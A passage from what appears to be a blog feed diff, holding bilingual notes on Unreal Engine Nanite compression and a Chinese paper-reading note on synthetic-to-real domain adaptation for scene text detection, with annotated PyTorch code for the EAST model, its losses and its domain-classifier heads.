        现在在控制台中,并正在通过 DirectStorage 进入 PC

      • Unbeatably fast, but general purpose

        速度无与伦比,但用途广泛

      • String deduplication and entropy coding

        字符串重复数据删除和熵编码

    • For better compression

      为了更好的压缩

      • Domain-specific transforms

        特定于域的转换

      • Focus on redundancies not already captured by LZ and massaging the data to better fit how LZ compression

        关注 LZ 尚未捕获的冗余,并对数据进行处理,以更好地适应 LZ 压缩方式

    • Transcode on the GPU

      GPU 上的转码

      • High throughput for parallel transforms, currently runs at ~50GB/s with fairly unoptimized code on PS5

        并行转换的高吞吐量,目前在 PS5 上以约 50GB/s 的速度运行,代码相当未优化

      • Powerful in combination with hardware LZ

        与硬件 LZ 结合使用功能强大

      • Eventually stream data directly to GPU memory

        最终将数据直接流式传输到 GPU 内存

    Results: Lumen in the Land of Nanite

    结果:Nanite 土地上的管腔

    • 433M Input triangles, 882M Nanite triangles

      433M 输入三角形,882M Nanite 三角形

    • Raw data: 25.90GB Memory format: 7.67GB

      原始数据:25.90GB 内存格式:7.67GB

    • Compressed: 6.77GB Compressed disk format: 4.61GB

      压缩:6.77GB 压缩磁盘格式:4.61GB

    • ~20% improvement since Early Access

      自早期访问以来提高了约 20%

    • 5.6 bytes per Nanite triangle, 11.4 bytes per input triangle

      每个 Nanite 三角形 5.6 个字节,每个输入三角形 11.4 个字节

    • 1M triangles = ~10.9MB on disk

      1M 三角形 = 磁盘上约 10.9MB

    webp

    Welcome to Billions of Triangles World

    欢迎来到亿万三角形世界

    Jungle of Nanite Geometries

    Nanite 几何丛林

    webp

    References

    ]]>
    @@ -825,7 +825,7 @@ /posts/Paper-%E9%87%8D%E8%AF%BB-Synthetic-to-Real%20Unsupervised%20Domain%20Adaptation%20for%20Scene%20Text%20Detection%20in%20the%20Wild/ - 资源

    全文

    Abstract

    ​基于深度学习的场景文本检测算法在充分利用已标注的训练数据的基础上,能够获得较好的检测性能。然而,手动贴标签费时费力。在极端情况下,相应的注释数据不可用。利用合成数据是一种非常有前途的解决方案,但合成数据与真实的数据之间的域分布不匹配除外。针对场景文本检测中存在的严重域分布不匹配问题,提出了一种从合成域到真实的域的自适应场景文本检测方法。本文提出了一种基于**文本自训练(TST)和对抗性文本实例对齐(ATA)**的自适应场景文本检测方法。ATA 通过以对抗的方式训练域分类器来帮助网络学习域不变特征。TST 减少了来自不准确伪标签的假阳性(FP)和假阴性(FN)的不利影响。当从合成场景适应到真实的场景时,两个分量对提高场景文本检测器的性能有积极的作用。我们通过从 SynthText、VISD 转移到 ICDAR2015、ICDAR2013 对所提出的方法进行了评估。实验结果验证了所提方法的有效性,提高了 10% 以上,对领域自适应场景文本检测具有重要的探索意义。

    1 Introduction

    ​场景文本检测因其在计算机视觉中的众多应用而受到越来越多的关注。此外,在过去的几十年里,场景文本检测取得了巨大的成功。然而,这些检测方法需要手动标记大量的训练数据,这非常昂贵且耗时。虽然已经存在几个公共基准,但它们只涵盖了非常有限的场景。在现实世界中,特定的应用程序任务通常需要收集和注释新的训练数据集,而收集足够的标记数据是困难的,甚至是不可能的。因此,昂贵的标签成本已成为基于深度学习方法的文本检测应用的主要问题

    ​随着计算机图形学的飞速发展,一种可供选择的方法是利用大量可从虚拟世界中获得的合成数据,并且可以自由地和自动地生成地面实况。

    • SynthText 首先提供了一个虚拟场景文本数据集,并自动生成带有单词级和字符级注释的合成图像。
    • VISD 为文本合成配备了选择性语义分割,以产生更真实的样本。
    • UnrealText 通过 3D 图形引擎提供逼真的虚拟场景文本图像,该 3D 图形引擎通过将场景和文本作为一个整体呈现来提供逼真的外观。

    ​尽管合成数据提供了在训练场景文本检测器中替代真实的图像的可能性,其具有低标注成本和高标注精度,但是许多先前的工作也表明,由于被称为“域移位 Domain Shift”的现象,仅使用合成数据的训练降低了对真实的数据的性能。如图 1 所示,与常见对象不同,文本在现实场景中具有更多的形状、颜色、字体、大小和方向的多样性,这导致合成数据与真实的数据之间存在较大的域差距。因此,当仅从合成数据向真实的数据应用模型学习时,模型的性能显著降低。

    webp

    不同数据集的例子。第一行分别来自真实的 ICDAR 2013、ICDAR 2015 和 ICDAR 2017 MLI。
    第二行来自 SynthText、VISD 和 UnrealText。在合成数据和真实的数据之间仍有相当大的领域差距。

    ​为了解决域偏移问题,提出了一种基于合成到真实的域的场景文本检测方法,该方法利用合成数据和未标记的真实的数据,有效地提高了模型在真实的数据上的性能。受 [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org)[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,本文提出了一种文本自训练(TST)方法和**一种对抗性文本实例对齐(ATA)**来减少域移位。

    自训练在领域自适应常见对象检测和语义分割方面取得了出色的结果。然而,场景文本检测任务更多样化的情况下,复杂的背景还没有在这个方向上探索。为了更好地将自训练应用于场景文本检测,TST 用于抑制伪标签中出现的假阳性和假阴性的不利影响。此外,我们首先利用对抗学习帮助模型学习场景文本的区分特征。对**抗性学习已被证明在域自适应图像分类和常见对象检测等任务中是有效的。由于大多数场景文本检测器都是单阶段检测器,因为它们没有区域建议过程,因此我们提出 ATA 以对抗训练方式对齐文本实例的判别特征。**本文的主要贡献如下:

    • 我们引入文本自训练(TST),通过最小化不准确伪标签的不利影响来提高域自适应场景文本检测的性能。
    • 我们提出了**对抗性文本实例对齐(ATA)**来帮助模型学习域不变特征,从而增强模型的泛化能力。
    • 我们首先介绍了一种用于场景文本检测的合成到真实的域自适应方法,该方法将知识从合成数据(源域)转移到真实的数据(目标域)。

    ​通过针对场景文本检测传输任务(例如,SynthText → ICDAR 2015)。实验结果表明,该方法能够有效解决场景文本检测中的域偏移问题,对领域自适应场景文本检测具有重要的探索意义。

    2.1 Scene Text Detection

    ​简介场景文本检测。

    2.2 Domain Adaptation

    领域自适应减少了训练数据和测试数据之间的领域差距。最近的方法使用更有效的方法来减少域间隙,例如将域分类器与梯度反转结合。

    2.3 Self-Training

    ​先前的工作使用自我训练来弥补分类信息的缺乏。然而,由于前期工作的不足,文本检测在自训练方法上还需要进一步的探索。

    3 Proposed Method

    ​在这一节中,分析了由畴移引起的问题。此外,我们介绍了 TST 和 ATA 的原理,以及如何使用它们进行域适配。为了评估我们的方法,采用 EAST 作为基线。

    3.1 Problem and Analysis

    虽然合成场景文本数据可以自动生成多样化的外观和准确的 GT,但仅用合成数据训练的模型不能直接应用于真实的场景,因为合成数据集和真实的数据集之间存在显著的域偏移。从概率的角度看问题会更清楚。我们将合成数据域称为源域,将真实的数据域称为目标域。场景文本检测问题可以看作是学习后验 $P(B|I)$(已知图像特征求预测边界框),其中 $I$ 是指图像特征,$B$ 是文本实例的预测边界框。使用贝叶斯公式,后验 $P(B|I)$ 可以分解为:

    $$P(B|I)=\frac{P(I|B)*P(B)}{P(I)}=\frac{P(I|B)}{P(I)}*P(B)$$

    ​我们在此任务中进行协变量移位假设,即先验概率 $P(B)$ 对于两个域是相同的(预测边界框的划定相同,正确划定出文本的范围)。$P(I|B)$是指 $I$ 的条件概率,这意味着在给定预测结果为真的情况下学习到真特征的可能性。我们还考虑了 $P(I|B)$ 对于两个域而言是相同的。因此,后验概率的差异由先验概率 $P(I)$ 引起(提取出的特征不同)。换句话说,为了检测文本实例,检测结果中的差异是由域改变特征引起的。为了提高模型的泛化能力,模型需要学习更多的域不变特征,无论输入图像属于哪个域都保持相同的 $P(I)$(迫使模型在读取合成数据和真实数据时,都提取出同样的特征)。在 EAST 模型中,图像特征 $P(I)$ 是指从 backbone 输出的特征。因此,特征图应该在源域和目标域之间对准(即,$P_{s}(I)=P_{t}(I)$)。为了实现这一目标,我们建议 ATA 协调这些特性,下一小节将介绍更多详细信息。

    3.2 Adversarial Text Instance Alignment

    ​受 [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,采用 ATA 来帮助网络学习域不变特征。在 EAST 模型中,图像特征 $P(I)$ 是指主干的特征图输出(即,384,图 2 中的 1/32 特征)。为了在源域和目标域之间对齐特征 $P(I)$,使用域分类器来混淆特征域。具体地,针对每个输入图像训练域分类器,并预测图像所属的域标签(代码中 y_pred_prob_f)。我们假设模型的输入样本为 $x\in X$,其中 $X$ 是某个输入空间。$y_i$ 表示第 $i$ 个训练图像的域标签(代码中 y_true),对于源域 $y_i=0$,对于目标域 $y_i = 1$。$p_i(x)$ 是域分类器的输出,我们使用交叉熵作为损失函数:

    $$L_d=-\sum_i(y_i\times ln^{p_i(x)}+(1-y_i)\times ln^{1-p_i(x)})$$

    def bce_loss(y_true, y_pred_logits):
    # y_true:真实标签(0 或 1)。
    # y_pred_logits:模型的原始预测值(logits),即未经过激活函数的输出。
    # y_pred_prob = F.sigmoid(y_pred_logits)
    # y_true_f = y_true.view(-1)
    # y_true_f = y_true
    y_pred_logits = y_pred_logits.view(-1)
    y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7) # 调整预测值范围:将预测值限制在 [1e-7, 1 - 1e-7] 之间,以防止对数计算时出现数值不稳定。
    return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean() # 计算交叉熵损失,并返回平均损失。

    ​为了学习域不变特征,我们以对抗的方式优化参数。通过最小化上述域分类损失来优化域分类器的参数,并且通过最大化该损失来优化基础网络的参数。更详细地说,梯度反转层(GRL)被添加在 EAST 的主干和域分类器之间,当通过 GRL 层时,梯度的符号被反转(梯度反转层主要同在特征提取器与域分类器之间,那么在反向传播过程中,域分类器的域分类损失的梯度反向传播到特征提取器的参数之前会自动取反,进而实现了类似与 GAN 的对抗损失。)。如图 2 所示,特征金字塔网络(FPN)和骨干网在训练阶段都最小化了 EAST 的原始损失 $L_{task}$。$L_{task}$ 具体表示 EAST 中的评分图损失几何形状损失。$L^t_{task}$ 任务是指在目标域中使用伪标签进行训练,$L^s_{task}$ 任务表示在源域中进行训练。因此,不同参数空间的训练目标不同:

    $$\begin{cases}L_f=\min(L_{task}t(\theta_f|xt)+L_{task}s(\theta_f|xs)-\lambda L_d(\theta|(xs,xt)))&\theta_f\in F ,\L_d=\min(L_d(\theta_d|(xs,xt)))&\theta_d\in C ,\L_h=\min(L_{task}t(\theta_h|xt)+L_{task}s(\theta_h|xs))&\theta_h\in D ,\end{cases}$$

    • 骨干网络的目标:最小化检测的损失、最大化域分类器的损失(既要骗过 Domain Classifier,又要提取出有价值的特征。
    • 域分类器的目标:最小化域分类器的损失
    • FPN 的目标:最小化检测的损失(依旧做标签预测。

    ​其中 $F$、$C$、$D$ 分别是骨干、域分类器和 FPN 的参数空间。总体训练目标如下:

    $$L=L_f+L_h+\lambda L_d$$

    class Loss_target(nn.Module):
    def __init__(self, weight_angle=10):
    # 角度损失的权重系数。默认为 10,用于控制角度损失在总损失中的影响程度。
    super(Loss_target, self).__init__()
    self.weight_angle = weight_angle
    self.bce = bce_loss
    # 指定使用的二分类交叉熵损失函数 (bce_loss),它在 forward 方法中用来计算领域损失。

    def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map,pre_domain):
    if torch.sum(gt_score) < 1:
    return torch.sum(pred_score + pred_geo) * 0
    # 如果 gt_score 的总和小于 1(表示没有有效的目标),则返回 0 作为损失,避免计算损失时出现错误或不必要的计算。

    classify_loss = get_dice_loss(gt_score, pred_score*(1-ignored_map))
    # 使用 get_dice_loss 计算分类损失。pred_score * (1 - ignored_map) 是预测分数与忽略区域掩码结合后的结果,确保在计算损失时忽略掉指定的区域。

    gt_doamin = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
    doamin_loss = self.bce(gt_doamin, pre_domain)
    # 生成一个目标领域分数 gt_doamin,设为 1,并将其转移到 GPU 设备上。使用 bce_loss 计算领域损失,这里领域损失衡量模型预测的领域分数与目标领域分数之间的差异。

    iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)

    angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
    iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
    geo_loss = self.weight_angle * angle_loss + iou_loss
    # 使用 get_geo_loss 计算几何损失,包括交并比(IoU)损失和角度损失。
    # 计算角度损失和 IoU 损失,并根据 weight_angle 进行加权,得到总的几何损失。
    # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
    return geo_loss, classify_loss, doamin_loss # 返回三个损失值:几何损失、分类损失和领域损失。

    ​其中 $\lambda$ 是权衡参数,我们在所有实验中将其设置为 0.2。通过优化损失,网络可以学习更多的文本域不变特征,更好地从合成数据转换到真实的数据。

    webp

    具有相应优化对象的网络架构。$\theta$ 表示 EAST 的参数。域分类器(绿色)经由梯度反转层添加在特征提取器之后,梯度反转层在基于反向传播的训练期间将梯度乘以某个负常数。$L_{task}$ 是 EAST 原有的检测损失,$L_d$ 是领域分类器的损失

    cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # 配置列表,指定网络层的类型和数量。

    def make_layers(cfg, batch_norm=False):
    layers = [] # 列表用于存储创建的层。
    in_channels = 3 # 初始化为 3,对应输入图像的通道数。
    for v in cfg:
    if v == 'M': # 如果值为 'M',添加一个 2x2 的最大池化层。
    layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
    else: # 否则,创建一个卷积层(nn.Conv2d),后跟可选的批归一化层和 ReLU 激活函数。
    conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
    if batch_norm:
    layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
    else:
    layers += [conv2d, nn.ReLU(inplace=True)]
    in_channels = v # 更新 in_channels 为当前卷积层的输出通道数 v。
    return nn.Sequential(*layers) # 使用 nn.Sequential 将所有层打包成一个顺序容器,返回构造好的网络层。


    class VGG(nn.Module):
    def __init__(self, features):
    super(VGG, self).__init__()
    self.features = features # self.features:存储卷积层。
    self.avgpool = nn.AdaptiveAvgPool2d((7, 7)) # 自适应平均池化层,将特征图大小调整为 7x7。
    self.classifier = nn.Sequential(
    nn.Linear(512 * 7 * 7, 4096),
    nn.ReLU(True),
    nn.Dropout(),
    nn.Linear(4096, 4096),
    nn.ReLU(True),
    nn.Dropout(),
    nn.Linear(4096, 1000),
    ) # 全连接层的序列,包括两个 ReLU 激活层和 Dropout 层,用于分类。

    for m in self.modules(): # 初始化权重
    if isinstance(m, nn.Conv2d):
    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
    if m.bias is not None:
    nn.init.constant_(m.bias, 0)
    elif isinstance(m, nn.BatchNorm2d):
    nn.init.constant_(m.weight, 1)
    nn.init.constant_(m.bias, 0)
    elif isinstance(m, nn.Linear):
    nn.init.normal_(m.weight, 0, 0.01)
    nn.init.constant_(m.bias, 0)

    def forward(self, x):
    x = self.features(x) # 通过 self.features 处理输入 x。
    x = self.avgpool(x) # 应用自适应平均池化,将特征图调整为 7x7。
    x = x.view(x.size(0), -1) # 将池化后的特征图展平,以适应全连接层输入。
    x = self.classifier(x) # 通过 self.classifier 进行最终的分类预测。
    return x


    class extractor(nn.Module): # 特征提取层。
    def __init__(self, pretrained):
    super(extractor, self).__init__()
    vgg16_bn = VGG(make_layers(cfg, batch_norm=True)) # 使用 VGG 类创建带有批量归一化的 VGG16 网络。
    if pretrained:
    # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
    # vgg16_bn.load_state_dict(state_dict)
    if pretrained: # 如果 pretrained 为 True,则加载本地路径的预训练权重。
    vgg16_bn.load_state_dict(torch.load(
    '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
    self.features = vgg16_bn.features # self.features 被设置为 VGG16 网络的卷积层部分。(使用 VGG16 进行特征提取)

    def forward(self, x):
    out = []
    for m in self.features: # 遍历 self.features 中的每一层,对输入 x 进行逐层处理。
    x = m(x)
    if isinstance(m, nn.MaxPool2d): # 将每个最大池化层的输出保存到 out 列表中。
    out.append(x)
    return out[1:] # 返回 out[1:],即从第二个池化层开始的特征图。这通常是为了匹配特定的特征提取需求。
    class merge(nn.Module):  # EAST 的核心特征融合层。负责在特征图上进行一系列卷积操作并融合来自不同尺度的特征。它的主要任务是通过逐步上采样和融合不同层的特征图来生成最终的输出特征图。这通常用于目标检测和分割任务中的特征融合阶段。
    def __init__(self):
    super(merge, self).__init__()

    self.conv1 = nn.Conv2d(1024, 128, 1)
    self.bn1 = nn.BatchNorm2d(128)
    self.relu1 = nn.ReLU()
    self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
    self.bn2 = nn.BatchNorm2d(128)
    self.relu2 = nn.ReLU()

    self.conv3 = nn.Conv2d(384, 64, 1)
    self.bn3 = nn.BatchNorm2d(64)
    self.relu3 = nn.ReLU()
    self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
    self.bn4 = nn.BatchNorm2d(64)
    self.relu4 = nn.ReLU()

    self.conv5 = nn.Conv2d(192, 32, 1)
    self.bn5 = nn.BatchNorm2d(32)
    self.relu5 = nn.ReLU()
    self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
    self.bn6 = nn.BatchNorm2d(32)
    self.relu6 = nn.ReLU()

    self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
    self.bn7 = nn.BatchNorm2d(32)
    self.relu7 = nn.ReLU()

    for m in self.modules():
    if isinstance(m, nn.Conv2d):
    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
    if m.bias is not None:
    nn.init.constant_(m.bias, 0)
    elif isinstance(m, nn.BatchNorm2d):
    nn.init.constant_(m.weight, 1)
    nn.init.constant_(m.bias, 0)

    def forward(self, x):
    # F.interpolate:将特征图上采样到较大的空间分辨率,使用 bilinear 插值方法。
    # torch.cat:将上采样后的特征图与来自不同层的特征图沿通道维度拼接,结合不同尺度的信息。
    y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
    y = torch.cat((y, x[2]), 1)
    y = self.relu1(self.bn1(self.conv1(y)))
    y = self.relu2(self.bn2(self.conv2(y)))

    y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
    y = torch.cat((y, x[1]), 1)
    y = self.relu3(self.bn3(self.conv3(y)))
    y = self.relu4(self.bn4(self.conv4(y)))

    y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
    y = torch.cat((y, x[0]), 1)
    y = self.relu5(self.bn5(self.conv5(y)))
    y = self.relu6(self.bn6(self.conv6(y)))

    y = self.relu7(self.bn7(self.conv7(y)))
    return y


    class output(nn.Module): # 输出层
    def __init__(self, scope=512):
    super(output, self).__init__()
    self.conv1 = nn.Conv2d(32, 1, 1) # 卷积层,用于处理输入的特征图。它们的输出通道数不同,目的是生成不同类型的预测。
    self.sigmoid1 = nn.Sigmoid() # 分别应用于卷积层输出的 Sigmoid 激活函数,用于输出概率。

    # self.conv1_1 = nn.Conv2d(32, 1, 1)
    # self.sigmoid1_1 = nn.Sigmoid()

    self.conv2 = nn.Conv2d(32, 4, 1)
    self.sigmoid2 = nn.Sigmoid()
    self.conv3 = nn.Conv2d(32, 1, 1)
    self.sigmoid3 = nn.Sigmoid()
    self.scope = 512 # 一个用于缩放位置预测的参数,设为 512。

    # GRL domina classifier
    # self.gap = nn.AdaptiveAvgPool2d(1)
    # self.sigmoid_gap = nn.Sigmoid()
    # self.GRL = RevGrad()
    # self.conv_gap = nn.Conv2d(32, 1, 1)

    for m in self.modules():
    if isinstance(m, nn.Conv2d):
    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') # 卷积层的权重使用 Kaiming 正态分布初始化,偏置项初始化为 0。
    if m.bias is not None:
    nn.init.constant_(m.bias, 0)

    def forward(self, x):
    # score_1 = self.GRL(x)
    # grl = self.sigmoid_gap(self.conv_gap(score_1))

    # domain_feature = self.gap(self.GRL(C[3]))
    # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

    score = self.sigmoid1(self.conv1(x)) # 第一个卷积层的输出,经过 Sigmoid 激活函数处理,代表得分图。
    loc = self.sigmoid2(self.conv2(x)) * self.scope # 第二个卷积层的输出,经过 Sigmoid 激活函数处理并缩放,表示位置预测。
    angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi # 第三个卷积层的输出,经过 Sigmoid 激活函数处理并调整,表示角度预测。
    geo = torch.cat((loc, angle), 1) # 将位置和角度预测拼接起来,形成最终的几何输出。
    return score, geo
    class DAImgHead(nn.Module):
    """
    Adds a simple Image-level Domain Classifier head 添加一个图像级领域分类器头,用于图像层面的分类。
    """

    def __init__(self):
    """
    Arguments:
    in_channels (int): number of channels of the input feature 输入特征的通道数
    USE_FPN (boolean): whether FPN feature extractor is used 是否使用 FPN 特征提取器
    """
    super(DAImgHead, self).__init__()

    self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1) # 一个卷积层,将输入通道数从 512 转换为 256。
    self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1) # 一个卷积层,将通道数从 256 转换为 1。

    for l in [self.conv1_da, self.conv2_da]: # 权重初始化为均值为 0,标准差为 0.001 的正态分布,偏置初始化为 0。
    torch.nn.init.normal_(l.weight, std=0.001)
    torch.nn.init.constant_(l.bias, 0)

    def forward(self, x): # 输入 x 经过 conv1_da 和 ReLU 激活函数后,再经过 conv2_da 得到输出。
    t = F.relu(self.conv1_da(x))
    return self.conv2_da(t)


    class DAInsHead(nn.Module):
    """
    添加一个实例级领域分类器头,用于实例级别的分类。
    Adds a simple Instance-level Domain Classifier head
    """

    def __init__(self):
    """
    Arguments:
    in_channels (int): number of channels of the input feature
    """
    super(DAInsHead, self).__init__()
    self.fc1_da = nn.Linear(2028, 1024) # 一个全连接层,将 2028 个输入特征转换为 1024 个输出特征。
    self.fc2_da = nn.Linear(1024, 1024) # 一个全连接层,将 1024 个输入特征转换为 1024 个输出特征。
    self.fc3_da = nn.Linear(1024, 1) # 一个全连接层,将 1024 个输入特征转换为 1 个输出特征。
    for l in [self.fc1_da, self.fc2_da]: # 权重初始化为均值为 0,标准差为 0.01 的正态分布(对于 fc1_da 和 fc2_da),fc3_da 的权重标准差为 0.05,偏置初始化为 0。
    nn.init.normal_(l.weight, std=0.01)
    nn.init.constant_(l.bias, 0)
    nn.init.normal_(self.fc3_da.weight, std=0.05)
    nn.init.constant_(self.fc3_da.bias, 0)

    def forward(self, x): # 输入 x 先通过 fc1_da 和 ReLU 激活,然后经过 50% 的 dropout,再通过 fc2_da 和 ReLU 激活,再次经过 50% 的 dropout,最后通过 fc3_da 得到输出。
    x = F.relu(self.fc1_da(x))
    x = F.dropout(x, p=0.5, training=self.training)

    x = F.relu(self.fc2_da(x))
    x = F.dropout(x, p=0.5, training=self.training)

    x = self.fc3_da(x)
    return x


    class DomainAdaptationModule(torch.nn.Module):
    """
    这个模块的主要作用是通过领域自适应来处理图像特征,使得模型能够更好地适应不同的领域。
    Module for Domain Adaptation Component. Takes feature maps from the backbone and instance
    feature vectors, domain labels and proposals. Works for both FPN and non-FPN.
    域适配组件模块。从主干和实例特征向量、域标签和建议中提取特征图。适用于 FPN 和非 FPN。
    """

    def __init__(self):
    super(DomainAdaptationModule, self).__init__()

    self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7) # 一个 7x7 的平均池化层,将输入的特征图缩小到 1x1。
    self.gap = nn.AdaptiveAvgPool2d(1) # 自适应平均池化层,将输入特征图压缩成每个通道一个值。
    self.sigmoid_gap = nn.Sigmoid() # 一个 Sigmoid 激活函数,将特征值压缩到 [0, 1] 范围。

    self.grl_img = GradientScalarLayer(-1.0 * 0.1) # 应用梯度反转层,用于在反向传播时反转梯度,鼓励网络学习领域不变特征。
    self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
    self.grl_img_consist = GradientScalarLayer(1.0 * 0.1) # 与 grl_img 和 grl_ins 类似,但用于不同的目标。
    self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

    self.imghead = DAImgHead() # 处理图像级特征的网络头部,用于领域分类。
    self.inshead = DAInsHead() # 处理实例级特征的网络头部,用于领域分类。


    def forward(self, img_features):
    """
    Arguments:
    img_features (list[Tensor]): features computed from the images that are used for computing the predictions. 从用于计算预测的图像中计算出的特征。
    da_ins_feature (Tensor): instance-level feature vectors 实例级特征向量。
    da_ins_labels (Tensor): domain labels for instance-level feature vectors 实例级特征向量目标的域标签
    targets (list[BoxList): ground-truth boxes present in the image (optional) 实例级特征向量目标的域标签(list[BoxList):图像中存在的地面真值框(可选)

    Returns:
    losses (dict[Tensor]): the losses for the model during training. During testing, it is an empty dict. 模型在训练过程中的损失。在测试过程中,它是一个空字典。
    """
    img_grl_fea = self.grl_img(self.gap(img_features)) # 经过 grl 的 image-level feature # 通过 gap 层将特征图压缩为 1x1,然后通过 grl_img 反转梯度。

    da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea)) # 对 image-level feature 的每个层都压成 1*1 # 通过 imghead 处理反转后的图像特征,再经过 sigmoid_gap 激活函数,将每个特征值压缩到 [0, 1] 范围。

    return da_img_features
    class EAST(nn.Module):  # EAST 继承自 nn.Module,这是 PyTorch 中所有神经网络模型的基类。
    def __init__(self, pretrained=True):
    super(EAST, self).__init__()
    self.extractor = extractor(pretrained) # 初始化一个特征提取器。extractor 可能是一个预训练的卷积神经网络或类似模块,用于从输入图像中提取特征。如果 pretrained=True,则可能会使用预训练权重。
    self.merge = merge() # 初始化一个合并模块。merge 可能是一个用于处理提取到的特征的模块。
    self.output = output() # 初始化一个输出模块。output 可能是一个用于生成最终预测的模块。

    self.DomainAdaptation = DomainAdaptationModule() # 初始化一个领域自适应模块。DomainAdaptationModule 可能用于对特征进行领域自适应处理,以适应不同的数据分布或任务。

    def forward(self, x): # forward 方法定义了前向传播的计算过程,即如何将输入数据 x 通过网络进行处理,得到模型的输出。
    C = self.extractor(x) # 将输入 x 传递给特征提取器,得到特征 C。C 可能是一个包含多个特征图的列表或字典,其中 C[3] 是其中的一个特征图。
    class_domain = self.DomainAdaptation(C[3]) # 将特征图 C[3] 传递给领域自适应模块,得到 class_domain。这是对特征图进行领域自适应处理后的结果。

    return self.output(self.merge(C)), class_domain
    # self.merge(C): 将特征 C 传递给合并模块,合并不同层的特征。
    # self.output(self.merge(C)): 将合并后的特征传递给输出模块,生成最终预测。
    # return self.output(self.merge(C)), class_domain:返回两个值,分别是模型的最终预测结果和领域自适应模块的输出。

    3.3 Text Self-Training

    ​以前的工作已经证明了自我训练对领域适应的有效性。然而,自我训练的两个主要问题仍然需要进一步探讨:假阳性(FP)(实际没有,预测有)和假阴性(FN)(实际有,预测没有)发生在伪标签。不正确的伪标签会对我们的网络造成非常严重的负面影响。为了克服这些问题,TST 被设计成最小化 FP 和 FN 的不利影响。

    3.3.1 Reducing False Negatives.

    webp

    Up:提出了文本自我训练的框架。我们利用 SWS 对伪标签中的阳性样本进行过滤,以最大限度地减少假阳性,并选择三分之一置信度较低的阴性样本作为最终阴性样本,以最大程度地减少假阴性。
    Down:我们给出了伪标签的样本空间表示。
    (a):薄弱的训练可以有效地过滤掉假阴性。
    (b):假阳性通过笔划宽度和 SWS 的标准偏差($\sigma$)过滤掉。

    ​受 [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org) 的启发,利用弱监督方式来最小化假阴性的影响。如 EAST 中所定义的,原始分数图损失是

    $$L_s=-\sum_{i\in Pos}\beta Y^log\widehat{Y}-\sum_{i\in Neg}(1-\beta)(1-Y^)(1-\widehat{Y})$$

    ​ 其中 $\widehat Y=F_s$ 是分数图的预测,$Y^*$ 是基本事实。

    ​ 虽然网络是通过反向传播学习背景损失(即负面例子)来优化的,但在伪标签中出现的 $\mathrm{FP}$ 误导了网络。我们假设 $\mathrm{FP}$ 主要是通过硬负挖掘来选择的,例如模糊的文本和与背景相似的不寻常字体。为了减少 $\mathrm{FP}$ 的不利影响,我们忽略了一些有可能成为置信度得分的前景的背景例子。

    ​ EAST 的负面例子是像素图,一个像素更有可能被视为负面像素,而相应的置信度得分更高。

    ​ 因此,我们选择置信度得分最低的负样本像素(例如,$Neg/3$)的一部分作为最终的负示例,在图中表示为 $\widehat{Neg}/3$(红线)。相应的数学表达式为 $\widehat{Neg}=\eta Neg$,其中 $\eta$ 在所有实验中都设置为 $1/3$。对于那些具有高置信度分数的像素,网络不会优化该部分损失。最后,修改后的损失函数定义为:

    $$\begin{aligned}L_{sw}&=-\sum_{i\in Pos}\beta Y_i*log\widehat{Y}-\sum_{i\in\widehat{Ne}g}(1-\beta)(1-Y_i*)(1-\widehat{Y})\end{aligned}$$

    3.3.2 Reducing False Positives.

    与假阴性相对应的是,假阳性也会对网络造成严重干扰。自然场景中的一些图案和设计极易被识别为文本,从而导致伪标签不准确。取支持区域可靠分数(SRRS),我们提出了一种更合理的笔划宽度分数(SWS),该分数利用笔划宽度变换(SWT)来评估文本实例的预测框。

    $$SRRS(r*)=\frac1{N_s}\sum_{i=1}{N_s}IoU(r_i,r^)\cdot P(c^|r_i)$$

